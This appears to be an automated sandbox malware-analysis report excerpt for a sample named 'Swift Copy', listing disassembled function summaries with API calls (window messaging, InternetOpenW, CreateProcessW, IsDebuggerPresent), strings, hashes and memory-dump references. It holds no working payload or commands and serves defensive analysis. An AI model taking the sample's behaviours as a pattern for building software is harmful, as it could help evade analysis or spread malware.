                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: 5800e847d9d41eb5faaf4bd80d217e4c66da6e2d9b579ccd539483e5356b6d19
                                              • Instruction ID: 89c33ae41b43880510022d14af6003549d7c719dc9fce95d764a06f7b109e76c
                                              • Opcode Fuzzy Hash: 5800e847d9d41eb5faaf4bd80d217e4c66da6e2d9b579ccd539483e5356b6d19
                                              • Instruction Fuzzy Hash: B4318D71110604AEDB24DF78DC80EFB73ADFF98724F10A619F9A5A7290DA31AD91C760
                                              APIs
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E0461F
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E04634
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: 622b980354947f6399ce98c55b0a52e4e542ef456df49d85816f292a140dffab
                                              • Instruction ID: 77129484db4dc7933a221c1418c275cb4878092f7db43ff1e37a2463bae3dd8f
                                              • Opcode Fuzzy Hash: 622b980354947f6399ce98c55b0a52e4e542ef456df49d85816f292a140dffab
                                              • Instruction Fuzzy Hash: D53139B5A013099FDF14CFA9DA80BDA7BB5FF49304F105069EA04AB381E771A981CF90
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E0327C
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E03287
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 0972d07a0f620816c8fdca3d60a3f1678e778b23b333295f20f99e45a1ab8a66
                                              • Instruction ID: 3c8d53e1b4ce8dd2a9260417ee8712c7adf10ba47738c430bc99d8092b348374
                                              • Opcode Fuzzy Hash: 0972d07a0f620816c8fdca3d60a3f1678e778b23b333295f20f99e45a1ab8a66
                                              • Instruction Fuzzy Hash: ED1193712002087FEF259FA4DC85EBB376EEB54368F105525F518A72E1D6319D918760
                                              APIs
                                                • Part of subcall function 00D7600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                                • Part of subcall function 00D7600E: GetStockObject.GDI32(00000011), ref: 00D76060
                                                • Part of subcall function 00D7600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              • GetWindowRect.USER32(00000000,?), ref: 00E0377A
                                              • GetSysColor.USER32(00000012), ref: 00E03794
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 41814cbff8ac7d61b9ea651d2702ca154fc1dcf4c06eb4dd69387333148d0174
                                              • Instruction ID: 6ebb45463d25c9209d106b6abb3692ce6693295674ccbf30bec53866e3a52540
                                              • Opcode Fuzzy Hash: 41814cbff8ac7d61b9ea651d2702ca154fc1dcf4c06eb4dd69387333148d0174
                                              • Instruction Fuzzy Hash: 081129B2610209AFDF00DFB8CC45AEA7BB8EB08314F145A15F955E2290E735E8959B60
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DECD7D
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DECDA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 55d58c4fbd328036617b76c9014e684a41606e956a6c7b7cc3f8b0cc03ee5327
                                              • Instruction ID: 9b91f4ff0f58906f346d4be07591bfbccc6cc6290a7aaa8d4dd0bfb9044a090f
                                              • Opcode Fuzzy Hash: 55d58c4fbd328036617b76c9014e684a41606e956a6c7b7cc3f8b0cc03ee5327
                                              • Instruction Fuzzy Hash: E4110271221671BAD7386B678C48EE7BEACEF127A4F00522AB14993080D3729846D6F0
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00E034AB
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E034BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: 5a538c614e56beaf91eb4caffba2d8e11b4b90ec8d2146b8dd673cf393b9159b
                                              • Instruction ID: 9c81a88e5cbbae1076642f157b36daaae0f50ac362c0babe9285dc98e47d19bb
                                              • Opcode Fuzzy Hash: 5a538c614e56beaf91eb4caffba2d8e11b4b90ec8d2146b8dd673cf393b9159b
                                              • Instruction Fuzzy Hash: A9119D71100208AEEB114F74DC40AEA376EEB05378F606324F970AB1D0C771DCD19761
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • CharUpperBuffW.USER32(?,?,?), ref: 00DD6CB6
                                              • _wcslen.LIBCMT ref: 00DD6CC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: STOP
                                              • API String ID: 1256254125-2411985666
                                              • Opcode ID: 8c57090fcb3f6d0bf64634b860f7eb3a9fa6815a5e7fce880c62fec4f02264da
                                              • Instruction ID: 29994c620e8db534945fb38317513b552fa8062356bae3aa4769fa31c82e573e
                                              • Opcode Fuzzy Hash: 8c57090fcb3f6d0bf64634b860f7eb3a9fa6815a5e7fce880c62fec4f02264da
                                              • Instruction Fuzzy Hash: 880104326105268ACB209FFDDC818BF7BA5EB60710714052AE85292291FB31D844C6B0
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DD1D4C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: e47fa85910aae3514a596000a8c0a471769e7b5d276c7bd788a3b1b03e36e0ff
                                              • Instruction ID: 40e8b2922a5bea426f9f2995adcc9268b84b5ba58141f61534c320571aca0693
                                              • Opcode Fuzzy Hash: e47fa85910aae3514a596000a8c0a471769e7b5d276c7bd788a3b1b03e36e0ff
                                              • Instruction Fuzzy Hash: 44012876600228BBCB14EBA4CC15CFEB769EB12350F04060AF866673C1EB315908C671
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DD1C46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 42bd3834895c68bce1f266a58295a183a8551efe09f74a2389de78bc7be6f785
                                              • Instruction ID: 086fcc1366a06323f11192d0bae786740514247f250e9a2d4a8c3a69fdf39dff
                                              • Opcode Fuzzy Hash: 42bd3834895c68bce1f266a58295a183a8551efe09f74a2389de78bc7be6f785
                                              • Instruction Fuzzy Hash: F501A7767912047ADF14EB94CD66DFFF7A8DB11340F14001AA40677382EA219E18C6B2
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DD1CC8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 33b47d0e4cf3c6889223afdabaad31b2d2994f0a65ca478bac812d1b65b8fb07
                                              • Instruction ID: e8685af1f1db4577c3a0f85ae6b2211380438cf9810ea8428d2ae1b7b4b04aac
                                              • Opcode Fuzzy Hash: 33b47d0e4cf3c6889223afdabaad31b2d2994f0a65ca478bac812d1b65b8fb07
                                              • Instruction Fuzzy Hash: 090162B679121876CB15EBA9CE16EFEF7A8DB11340F140016B84673381EA619F18C672
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E43018,00E4305C), ref: 00E081BF
                                              • CloseHandle.KERNEL32 ref: 00E081D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: \0
                                              • API String ID: 3712363035-3218720685
                                              • Opcode ID: e8b2efecc81ea3318603382e71b709191b52ddd32d22564ab099ad559130157b
                                              • Instruction ID: 6cf119c8408ef343723706a4e5d8dbcf0d8eb58602db3b6a497e1afc669b8f7e
                                              • Opcode Fuzzy Hash: e8b2efecc81ea3318603382e71b709191b52ddd32d22564ab099ad559130157b
                                              • Instruction Fuzzy Hash: 4BF0E2B5640300BEE7206732AC06FB73A8CDB05750F000120BB48F50E2D67A9E4983F8
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: 3, 3, 16, 1
                                              • API String ID: 176396367-3042988571
                                              • Opcode ID: 9f6c06b12c1c4a55d6c6ff0d543e7cc583e06a4c6a18aad06d4ac50e3e7f2f3a
                                              • Instruction ID: 534b08408fee2e8246e4af8865f445d630ad6c0190d592b8455a178b6a8f13c1
                                              • Opcode Fuzzy Hash: 9f6c06b12c1c4a55d6c6ff0d543e7cc583e06a4c6a18aad06d4ac50e3e7f2f3a
                                              • Instruction Fuzzy Hash: 1EE02B022043242093312279DCC1DBF5689CFC9760715182FFA85C2267EA948D9293B0
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DD0B23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Message
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 2030045667-4017498283
                                              • Opcode ID: 3f5778f863ceaea0ed6efeb8ab59ee753b9be94e67d7ea6643093f0e98808b70
                                              • Instruction ID: 0b764c7cdc013b66164dc2770d61210018b4f099057df07dd100373f4d47a498
                                              • Opcode Fuzzy Hash: 3f5778f863ceaea0ed6efeb8ab59ee753b9be94e67d7ea6643093f0e98808b70
                                              • Instruction Fuzzy Hash: 2BE0D8322443087AD21437947C07F897BC4CF05B51F20042BF758655C38AD264D046B9
                                              APIs
                                                • Part of subcall function 00D8F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D90D71,?,?,?,00D7100A), ref: 00D8F7CE
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00D7100A), ref: 00D90D75
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D7100A), ref: 00D90D84
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D90D7F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 55579361-631824599
                                              • Opcode ID: 1560b5a7b36c1ce4170a3d957b4d2336d0bf91828e6ee74efdafea95e14d02cd
                                              • Instruction ID: 5dd0b1053168bf56497e734ee002bfe9639ce1803f27b636662bec6e9f9aaea7
                                              • Opcode Fuzzy Hash: 1560b5a7b36c1ce4170a3d957b4d2336d0bf91828e6ee74efdafea95e14d02cd
                                              • Instruction Fuzzy Hash: F1E065742007018FD7309F79E4043427FE4EB00750F04892DE496D6A91DBB1E4898BB1
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D8E3D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: 0%$8%
                                              • API String ID: 1385522511-2949748613
                                              • Opcode ID: 66841c83c2e57634ff0a4ae0d5349db8077c65e7665815435cd85d381d71ecba
                                              • Instruction ID: 384068ac53571d49be831842b535d0d3ec2fb1571dc3158a05ec1e453368c223
                                              • Opcode Fuzzy Hash: 66841c83c2e57634ff0a4ae0d5349db8077c65e7665815435cd85d381d71ecba
                                              • Instruction Fuzzy Hash: 55E02635500A10CFCB04B719B855A883351EB4A321B90916DF302A71D19B382C428B7A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: %.3d$X64
                                              • API String ID: 481472006-1077770165
                                              • Opcode ID: 00d67c6c8c505af702d809f9f4e9b016fa41b32af963e1267bcb2dc6023991c2
                                              • Instruction ID: 3ecca3887c7d179a5d4abff43021f6acb2676cbccbad1133db3434e9889029b0
